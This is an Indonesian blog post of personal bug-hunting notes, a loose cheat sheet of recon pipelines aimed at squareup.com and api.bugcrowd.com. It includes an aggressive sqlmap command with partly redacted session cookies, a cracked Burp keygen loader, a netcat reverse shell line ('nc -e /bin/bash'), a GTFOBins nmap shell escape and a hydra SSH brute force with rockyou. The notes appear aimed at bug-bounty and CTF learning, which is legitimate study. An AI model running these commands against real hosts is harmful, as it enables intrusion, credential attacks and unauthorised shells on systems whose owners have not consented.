Tuesday, April 13, 2021

Home » » Command standar

Command standar

April 13, 2021    No comments

 taksel ( aplikasi )

ps aux | grep ( melihat service yang jalan )

ntpd -gq ( syncron jam )

ntpdate -v pool.ntpd.org ( syncron waktu zona )

.*\.squareup\.com$ ( scan scope burp )

 

sebelum paralle install dulu menggunakan apt install parallel

cat redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
 ( scan burp )

buka burp

java -jar (burp-loader-keygen-2_1_07.jar)

ganti versi java di linux

sudo update-alternatives --config java


syncronace date

ntpd -gq

ntpdate -v pool.ntp.org ( syncron dengan server )

ntpda


cari nama domain

cat wilcards | assetfinder --subs-only | anew domains

cari host port 80

cat domains | httprobe -c 80 --prefer-https | anew hosts


cari domain

findomain -f wilcards | tee -a findomain.out

nmap -sP scan service port /24

nmap -v --script vuln ( scan vuln )



cat from-findomain | anew domains | httprobe -c 50 | anew hosts2



caRI ROOT


cat hosts2 | fff -d 1 -S -o roots



masuk ke directory

find . -type f | nano -


grep -hri host22 | anew
 1650  grep -hri host22 | anew


 grep -hri host23 | anew
 1678  ls
 1679  gf debug-pages
 1680  gf firebase
 1681  gf http-auth
 1682  gf
 1683  gf --help
 1684  gf --list
 1685  gf xss

gf servers
 1689  gf meg-headers


 find . -type f | nano
 1694  find . -type f | nano -
 1695  clear
 1696  gf servers | anew
 1697  gf meg-headers | nano -


waybackurls api.bugcrowd.com | nano -
 1708  curl -vs https://api.bugcrowd.com/robots.txt
 1709  waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt'
 1710  waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt' | fff -S 200 -d 10 -k -o robot-version
 1711  ls
 1712  waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt' | fff -S 200 -d 10 -k -o robot-version

 find . -type f -name *.body | wc
 1731  gf aws-keys


 curl -vs https://api.bugcrowd.com/robots.txt | nano -
 1881  curl -vs https://api.bugcrowd.com/robots.txt


httpx -o httpx.txt


 echo "nama domain" | subfinder -o domain.txt | cat domain.txt | assetfinder --subs-only | tee -a test.txt


cat wilcards cat wilcards | assetfinder --subs-only | anew domains | | httprobe -c 80 --prefer-https


cat wilcards | subfinder -o domain.txt | cat domain.txt | assetfinder --subs-only | anew domains | cat domains | httpx -o aktif

subfinder -d domain | tee

assetfinder --subs-only domain | tee

cat domain(nama domain yang mau di sortir) | sort -u | tee simpan

cat httpx

cat domain | httpx -follow-redirects -status-code -vhost -threads 300 -silent | sort -u | grep "[200]" | cut -d [ -f | sort -u | sed 's/[[:blank:]]*$//' | tee domain


nuclei

sqlmap -u 'https://squareup.com/dashboard/?%27ty%27im!%27#{''''@qw.com'  -technique=BEUSTQ --random-agent --risk 3 --level 5 --crawl 10


'_savt=8b8c3c1b-1f...1588e7a635;_onboard_session=UTRKbzJVVkh...45ba573c53;squareGeo=CH-ZH'

 

tools

ffuf

byp4xx
rapidscan
httpsmuggler / defparam/smuggler
breacher


python3 -c 'ímport pty:pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'

python3 -m http.server


export TERM=xterm



install repo github agar bisa digunakan secara general


go build .
mv  /usr/local/bin/
 
 
sqlmap -r ( untuk burp atau metode post)
sqlmap -m ( untuk link misal dari gf sqli )
 sqlmap -p untuk parameter
sqlmap --force-ssl untul sssl nya
Untuk filter tulisan 
 cat scan_aktiftest.txt | cut -d " " -f 4,5,6 | sort -u >> filter.txt



Repo github

1. git init

2. git remote add origin https://github.com/NamaRepo/S.git

git add


git commit -m "first commit"

git push  origin master
echo "# ZIMBRA" >> README.md
git init
git add README.md
git commit -m "first commit"
git branch -M main
git remote add origin https://github.com/x0x0r/ZIMBRA.git
git push -u origin main


tools scan port

https://gitlab.com/pokoyo.bughunter/web-security-bug-hunting-trainings/-/issues/433
https://pypi.org/project/threader3000/
https://github.com/dievus/threader3000

https://github.com/RustScan/RustScan
https://www.youtube.com/watch?v=fGG7BMS-RZI
https://www.geeksforgeeks.org/rustscan-faster-nmap-scanning-with-rust/

https://www.geeksforgeeks.org/vulscan-vulnerability-scanning-with-nmap-in-kali-linux/

Link belajar

https://www.hackingarticles.in/ctf-challenges-walkthrough/

https://www.hackingarticles.in/corrosion-2-vulnhub-walkthrough/

https://www.vulnhub.com/entry/corrosion-2,745/
 
bruteforce
 
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.107 ssh  
 
 
Command dasar dokcer compose dan docker file
 
docker-compose up -d ( buat install )

docker-compose ps -a liat status docker

docker container rm (rmi) ( nama kontainer ) hapus kontainer

docker images prune ( nama kontainer ) hapus images 

docker container ls

docker images ls

 docker container exec -it (nama kontainer)  /bin/bash

docker container start ( nama kontainer ) 

select * from users;
https://github.com/Darkness4/dvwa-docker.git
https://github.com/Darkness4/dvwa-docker 

https://github.com/cytopia/docker-dvwa
https://github.com/digininja/DVWA


tools
https://www.bugbountyhunter.com/guides/?type=bugbounty_toolkit

commad cari hash
 
echo -n "hash nya" | base64 -d

-d ( decrypt nya )
 
bypass nmap
 TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
 
https://gtfobins.github.io/gtfobins/nmap/

nc -lnvp

l = listen 
n = ip only ( ip yang terbuka )

v = verbose

p = port 

contoh nc -lvnp -s

s = source

nc -e /bin/bash ( ip ) (port)


echo -n ( masukin hash nya ) | base64 -d ( untuk cari hash encrypsi)
 
osint
 
https://sploitus.com/ 
https://hunter.how/


web archive cdx api


https://archive.org/developers/wayback-cdx-server.html

https://viewdns.info/


http://web.archive.org/cdx/search/cdx?url=*.api.bugcrowd.com&collapse=urlkey&matchType=prefix  
 
 
CVE-2024-4577















Related Posts:
  • Instalasi FTP server pada ubuntu part 1kali ini kita akan belajar membangun FTP, FTP sendiri merupakan fitur atau sebuah protocol yang berfungsi untuk bertukar file dalam suatu jaringan, ftp mengunakan koneksi TCP cara kerja nya hampir mirip dengan Protocol lain n… Read More
  • Menambahkan Repository ubuntu
 
  
 


 
  Normal
  0
  
  
  
  
  false
  false
  false
  
  EN-US
  X-NONE
  X-NONE
  
   
   
   
   
   
   
   
   
   
  
  
   
   
   
   
   
   
   
   
   
   
   
  

 
  
  
  
  
  
  
  
  
  
  
  
  
  
 … Read More
  • Perintah dasar Ubuntu

v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}



 
  
 

 
  Normal
  0
  false
  
  
  
  false
  false
  false
  
  EN-US
  X… Read More
  • Konfigurasi DNS & Web Server di ubuntuDns merupakan sebuah aplikasi service pada jaringan yang berguna untuk menerjemahkan alamat ip address menjadi sebuah nama.
Web server merupakan sebuah perangkat lunak yang berfungsi untuk menerima dan menampilkan semua permi… Read More
  • Membangun Web Application Firewall ( WAF) Sederhana









Sebelum kita membangun sebuah WAF seberapa sering kita mendengar kata Firewall ? Mungkin saat kita mendengar kan kata firewall kita langsung berfikir dinding atau tembok api.

Firewall salah satu mekanisme ( policy)… Read More
































0
comments:
        
















Post a Comment